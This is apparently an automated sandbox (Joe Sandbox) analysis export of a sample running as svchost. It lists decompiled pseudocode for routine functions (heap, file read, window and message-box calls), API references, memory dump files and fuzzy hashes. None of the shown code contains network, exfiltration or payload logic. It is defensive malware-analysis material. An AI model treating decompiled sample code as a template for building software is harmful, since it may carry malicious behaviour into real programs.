    0x00474e39
    0x00474e3e
    0x00474e4d
    0x00474e50
    0x00000000
    0x00474e52
    0x00474e52
    0x00000000
    0x00474e52
    0x00474e40
    0x00474e40
    0x00474e45
    0x00474e57
    0x00474e59
    0x00474e6a
    0x00474e6c
    0x00474e6d
    0x00474e5b
    0x00474e61
    0x00000000
    0x00474e61
    0x00474e59
    0x00474e3e

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0046FDBA,00000001), ref: 00474E22
      • Part of subcall function 00474CC9: GetVersionExA.KERNEL32 ref: 00474CE8
    • HeapDestroy.KERNEL32 ref: 00474E61
      • Part of subcall function 00478715: RtlAllocateHeap.NTDLL(00000000,00000140,00474E4A), ref: 00478722
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Heap$AllocateCreateDestroyVersion
    • String ID:
    • API String ID: 760317429-0
    • Opcode ID: cfbd5988643477985f38bb479e9ee5f2aba22e3c5d935e2565ae317537ac9425
    • Instruction ID: cf03a4b162572e45c248adf41b665e613762ef543446486fbdc4ba5193130576
    • Opcode Fuzzy Hash: cfbd5988643477985f38bb479e9ee5f2aba22e3c5d935e2565ae317537ac9425
    • Instruction Fuzzy Hash: 8FF06570980341AAEF606B355C85BBA3690A7D0765F20C87BF40DC91A1EF7894C1961E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00483BDD Relevance: 3.0, APIs: 2, Instructions: 26COMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 82%
    			E00483BDD(void* __ecx, void* __edi, void* __esi) {
				void* _t7;
				void* _t8;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;

				_push(__esi);
				_t20 = __ecx;
				_t15 = 0;
				_t7 =  *(__ecx + 4);
				if(_t7 != 0xffffffff) {
					_t11 = FindCloseChangeNotification(_t7); // executed
					asm("sbb edi, edi");
					_t15 =  ~_t11 + 1;
				}
				 *(_t20 + 4) =  *(_t20 + 4) | 0xffffffff;
				 *(_t20 + 8) =  *(_t20 + 8) & 0x00000000;
				_t8 = E0048324D(_t20 + 0xc, _t20);
				if(_t15 != 0) {
					return E00488652(_t22, GetLastError(), 0);
				}
				return _t8;
			}









    0x00483bdd
    0x00483bde
    0x00483be1
    0x00483be3
    0x00483be9
    0x00483bec
    0x00483bf6
    0x00483bf8
    0x00483bf8
    0x00483bf9
    0x00483bfd
    0x00483c04
    0x00483c0d
    0x00000000
    0x00483c18
    0x00483c1d

    APIs
    • FindCloseChangeNotification.KERNELBASE(00000001,?,?,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483BEC
    • GetLastError.KERNEL32(00000000,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483C11
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChangeCloseErrorFindLastNotification
    • String ID:
    • API String ID: 1687624791-0
    • Opcode ID: 8d3140f9479da9b3b23491ce4aa34307c9b239d6bf73abccd09aa20615cca5fa
    • Instruction ID: c25935b38089dc33ac9e3dc80a0a72eba11417365258a387dcd965eb98f43223
    • Opcode Fuzzy Hash: 8d3140f9479da9b3b23491ce4aa34307c9b239d6bf73abccd09aa20615cca5fa
    • Instruction Fuzzy Hash: 98E092361007005BC3246B39CD09A5F7299AFD1B36F908F2EE57AC31E1CFB899058714
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00483ADF Relevance: 3.0, APIs: 2, Instructions: 22fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00483ADF(void* __ecx, void* _a4, long _a8) {
				void* __ebp;
				int _t8;
				void* _t14;

				if(_a8 != 0) {
					_t8 = ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0); // executed
					if(_t8 == 0) {
						E00488652(_t14, GetLastError(), _t8);
					}
					return _a8;
				}
				return 0;
			}






    0x00483ae6
    0x00483afb
    0x00483b03
    0x00483b0d
    0x00483b0d
    0x00000000
    0x00483b12
    0x00000000

    APIs
    • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,0040BA8C,00000000,?,?,?,00000020,00000000), ref: 00483AFB
    • GetLastError.KERNEL32(00000000,?,0040BA8C,00000000,?,?,?,00000020,00000000), ref: 00483B06
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorFileLastRead
    • String ID:
    • API String ID: 1948546556-0
    • Opcode ID: c9966699da0b13ed726d343e574835c0601bd6290ac9eab7714f47aab154512e
    • Instruction ID: a84ec9aa55fa59e60ae9caea0285029cfe1130f1885002ffc46c72fb6a492a7b
    • Opcode Fuzzy Hash: c9966699da0b13ed726d343e574835c0601bd6290ac9eab7714f47aab154512e
    • Instruction Fuzzy Hash: 50E01A72204208BACF106FA0CD04B9E37ACAB14711F40C866B91889111D779DA109B18
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00483B64 Relevance: 3.0, APIs: 2, Instructions: 16COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00483B64(void* __ecx, long _a4, long _a8) {
				long _t4;
				long _t9;
				void* _t10;

				_t4 = SetFilePointer( *(__ecx + 4), _a4, 0, _a8); // executed
				_t9 = _t4;
				if(_t9 == 0xffffffff) {
					E00488652(_t10, GetLastError(), 0);
				}
				return _t9;
			}






    0x00483b72
    0x00483b78
    0x00483b7d
    0x00483b88
    0x00483b88
    0x00483b90

    APIs
    • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 00483B72
    • GetLastError.KERNEL32(00000000), ref: 00483B81
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: a320ac0dd32bb0e87696fe87cb987a54176d1ba438d0b9c804a064e72df4e980
    • Instruction ID: d03d4cf21c8217914cfb0a045216b8992f8c06247af4a2e11707103b1fd8691f
    • Opcode Fuzzy Hash: a320ac0dd32bb0e87696fe87cb987a54176d1ba438d0b9c804a064e72df4e980
    • Instruction Fuzzy Hash: 90D05E325052207BC6103BA49D09F4ABA10AB24771F008E7BF6A4961E0C77188109795
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00417DF0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00417DF0(intOrPtr _a4) {
				int _t3;
				CHAR* _t7;

				_t3 = wsprintfA(_t7, 0x4acdfc, _a4);
				E00417E20( &(_t7[0xc]), 0); // executed
				return _t3;
			}





    0x00417e02
    0x00417e17
    0x00417e1f

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: wsprintf
    • String ID: ^I
    • API String ID: 2111968516-3473481074
    • Opcode ID: f129f87c1420ba8bd3e6fe6c7440591b3ad6696b58ebc2225540f945601d2827
    • Instruction ID: 212c34ea4e534eb2ea5799478f7159daee0002d5588ac54be613208c763618a4
    • Opcode Fuzzy Hash: f129f87c1420ba8bd3e6fe6c7440591b3ad6696b58ebc2225540f945601d2827
    • Instruction Fuzzy Hash: 22D0A7B8504300BBC214E7249C46F2B3776BBE0704F80882DFD05521C1EB78D918C5CE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 012805A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01280625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01280658
    Memory Dump Source
    • Source File: 00000007.00000003.319744915.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_3_1280000_svchost.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: 7258e169622909f7c37a01b95cd28206315578844d3a800f394b70e9254e2324
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: 60215B31A11219BFDB009FA4DC41BEEFFF5FB54294F20C122FA10A22C0E7744A559B64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484AB9 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00484AB9(void* __edx) {
				void* _t37;
				void* _t43;
				intOrPtr _t52;
				signed int _t55;
				signed int _t59;
				intOrPtr* _t62;
				void* _t63;
				intOrPtr* _t68;
				intOrPtr _t75;
				void* _t78;
				void* _t80;

				_t63 = __edx;
				E00473304(E00490C8C, _t78);
				 *((intOrPtr*)(_t78 - 0x10)) = _t80 - 0x34;
				_t52 = E0048CC47(0x4e140c, E0048BFC8);
				_t55 = 7;
				_t3 = _t52 + 0x34; // 0x34
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x14)) = _t52;
				_t37 = memcpy(_t78 - 0x40, _t3, _t55 << 2);
				_t75 =  *((intOrPtr*)(_t78 + 0x10));
				_t68 =  *((intOrPtr*)(_t78 + 8));
				 *_t37 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t52 + 0x3c)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t52 + 0x38)) = _t75;
				 *((intOrPtr*)(_t52 + 0x40)) =  *((intOrPtr*)(_t78 + 0x18));
				if(_t75 == 2) {
					_t62 =  *((intOrPtr*)(_t68 + 0x34));
					if(_t62 != 0) {
						 *((intOrPtr*)( *_t62 + 0x5c))(0);
					}
				}
				 *(_t78 + 0xc) =  *(_t78 + 0xc) & 0x00000000;
				if(_t75 == 0x110) {
					E00484946(_t68, _t78 - 0x24, _t78 + 0xc);
				}
				 *((intOrPtr*)(_t78 + 8)) =  *((intOrPtr*)( *_t68 + 0x98))(_t75,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t75 == 0x110) {
					E00484969(_t63, _t68, _t78 - 0x24,  *(_t78 + 0xc));
				}
				_t29 = _t52 + 0x34; // 0x34
				_t59 = 7;
				_t43 = memcpy(_t29, _t78 - 0x40, _t59 << 2);
				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
				return _t43;
			}














    0x00484ab9
    0x00484abe
    0x00484ace
    0x00484adb
    0x00484adf
    0x00484ae3
    0x00484ae6
    0x00484aec
    0x00484aef
    0x00484af4
    0x00484af7
    0x00484afa
    0x00484b02
    0x00484b08
    0x00484b0b
    0x00484b0e
    0x00484b10
    0x00484b15
    0x00484b1b
    0x00484b1b
    0x00484b15
    0x00484b1e
    0x00484b28
    0x00484b33
    0x00484b33
    0x00484b4f
    0x00484b52
    0x00484b5c
    0x00484b5c
    0x00484b9c
    0x00484b9f
    0x00484ba3
    0x00484baa
    0x00484bb3

    APIs
    • __EH_prolog.LIBCMT ref: 00484ABE
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologValue
    • String ID:
    • API String ID: 3700342317-0
    • Opcode ID: 233cf5806107037b0851c320a36c04d5b6adc674a29c3c3d41dd29189998e9be
    • Instruction ID: 6bd00d7da688e16720338f0aafff8b5326405ec5666fe8715f1f86c18ea4ffb4
    • Opcode Fuzzy Hash: 233cf5806107037b0851c320a36c04d5b6adc674a29c3c3d41dd29189998e9be
    • Instruction Fuzzy Hash: 0A214872A00219EFDF15EF54C481AEE7BA9EF84354F00446AF909AB241D778AE41CB94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004851E0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E004851E0(intOrPtr* __ecx, long _a4, CHAR* _a8, CHAR* _a12, long _a16, int _a20, int _a24, int _a28, int _a32, struct HWND__* _a36, struct HMENU__* _a40, void* _a44) {
				long _v8;
				CHAR* _v12;
				CHAR* _v16;
				long _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				struct HWND__* _v40;
				struct HMENU__* _v44;
				struct HINSTANCE__* _v48;
				void* _v52;
				void* __ebp;
				struct HWND__* _t59;
				struct HWND__* _t74;
				intOrPtr* _t76;

				_v8 = _a4;
				_v12 = _a8;
				_v16 = _a12;
				_v20 = _a16;
				_v24 = _a20;
				_v28 = _a24;
				_v32 = _a28;
				_v36 = _a32;
				_v40 = _a36;
				_t76 = __ecx;
				_v44 = _a40;
				_v48 =  *((intOrPtr*)(E0048C6BF() + 8));
				_v52 = _a44;
				_push( &_v52);
				if( *((intOrPtr*)( *_t76 + 0x5c))() != 0) {
					_push(_t76);
					E00485152();
					_t59 = CreateWindowExA(_v8, _v12, _v16, _v20, _v24, _v28, _v32, _v36, _v40, _v44, _v48, _v52); // executed
					_t74 = _t59;
					if(E0048519E() == 0) {
						 *((intOrPtr*)( *_t76 + 0xa4))();
					}
					return 0 | _t74 != 0x00000000;
				}
				 *((intOrPtr*)( *_t76 + 0xa4))();
				return 0;
			}



















    0x004851ea
    0x004851f0
    0x004851f6
    0x004851fc
    0x00485202
    0x00485208
    0x0048520e
    0x00485214
    0x0048521a
    0x00485220
    0x00485222
    0x00485230
    0x00485236
    0x0048523b
    0x00485243
    0x00485254
    0x00485255
    0x0048527e
    0x00485284
    0x0048528d
    0x00485293
    0x00485293
    0x00000000
    0x004852a0
    0x00485249
    0x00000000

    APIs
    • CreateWindowExA.USER32(00000000,00000080,0043C571,?,?,?,?,?,?,?,?,?), ref: 0048527E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateWindow
    • String ID:
    • API String ID: 716092398-0
    • Opcode ID: ee3e069548fcee52daa759e60350ae6bbab32fd5b98d2be2b434539d6035b7b2
    • Instruction ID: b31d22a1fe4475b7376297e7bc0a165314d3428bf369717753a51afca0491d69
    • Opcode Fuzzy Hash: ee3e069548fcee52daa759e60350ae6bbab32fd5b98d2be2b434539d6035b7b2
    • Instruction Fuzzy Hash: DA319C79A00219AFCF41DFA8C944ADEBBF1BF4C314B11446AF918E7310E7359A519FA4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004854D0 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 91%
    			E004854D0(void* __ecx) {
				void* _t8;
				int _t10;
				int _t15;
				intOrPtr* _t19;
				void* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1c)) != 0) {
					_push(0);
					_t3 = E00484C12() + 4; // 0x4
					_t8 = E00482C51(_t3,  *(_t24 + 0x1c));
					_t19 =  *((intOrPtr*)(_t24 + 0x38));
					_t22 = _t8;
					if(_t19 != 0) {
						_t10 =  *((intOrPtr*)( *_t19 + 0x50))();
					} else {
						_t10 = DestroyWindow( *(_t24 + 0x1c)); // executed
					}
					_t15 = _t10;
					if(_t22 == 0) {
						E00484D02(_t24);
					}
					return _t15;
				} else {
					return 0;
				}
			}









    0x004854d1
    0x004854d7
    0x004854df
    0x004854e9
    0x004854ec
    0x004854f1
    0x004854f4
    0x004854f8
    0x00485507
    0x004854fa
    0x004854fd
    0x004854fd
    0x0048550c
    0x0048550e
    0x00485512
    0x00485512
    0x0048551c
    0x004854d9
    0x004854dc
    0x004854dc

    APIs
    • DestroyWindow.USER32(00000000,00000000,00000000,?,?,?,00485358,^I,?,00414E0C), ref: 004854FD
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: 5e752744249cf693c449438708b0452e10239b3df346c48ed9b414cc7a1f9b88
    • Instruction ID: b26c03780e52c495fe99efb5924b3ae9fc1845b2a3fd7aab5a1c4a3191b3a0f2
    • Opcode Fuzzy Hash: 5e752744249cf693c449438708b0452e10239b3df346c48ed9b414cc7a1f9b88
    • Instruction Fuzzy Hash: 70F0A731205A01AFDB647F25F959B5F77A5FF80719B01487FF40287661EB64DC468B04
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041B060 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041B060(void* __ecx, long _a4) {
				void* _v8;
				void* _t7;
				void* _t11;

				_t11 =  *0x4c97bc; // 0xae0000
				_t7 = RtlAllocateHeap(_t11, 0, _a4); // executed
				_v8 = _t7;
				if(_v8 == 0) {
					E00417DF0(_a4);
				}
				return _v8;
			}






    0x0041b06a
    0x0041b071
    0x0041b077
    0x0041b07e
    0x0041b084
    0x0041b089
    0x0041b092

    APIs
    • RtlAllocateHeap.NTDLL(00AE0000,00000000,?), ref: 0041B071
      • Part of subcall function 00417DF0: wsprintfA.USER32 ref: 00417E02
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocateHeapwsprintf
    • String ID:
    • API String ID: 1352872168-0
    • Opcode ID: 9212650fad78315cff7f55bbc62bce5e3cb9f5e3fd40723f76164925141d8756
    • Instruction ID: 9e747384a05daca50358990f612c59e048caf88d5c36d495edb59f0dd1a90023
    • Opcode Fuzzy Hash: 9212650fad78315cff7f55bbc62bce5e3cb9f5e3fd40723f76164925141d8756
    • Instruction Fuzzy Hash: F1E08CB990120CFBCB00DF94E945EAF77B8EB08300F0081A9F90847340D636AE40CBD8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004200E0 Relevance: 1.5, APIs: 1, Instructions: 7windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004200E0(CHAR* _a4) {
				int _t3;

				_t3 = MessageBoxA(0, _a4, 0x4ad6f4, 0x10); // executed
				return _t3;
			}




    0x004200ee
    0x004200f4

    APIs
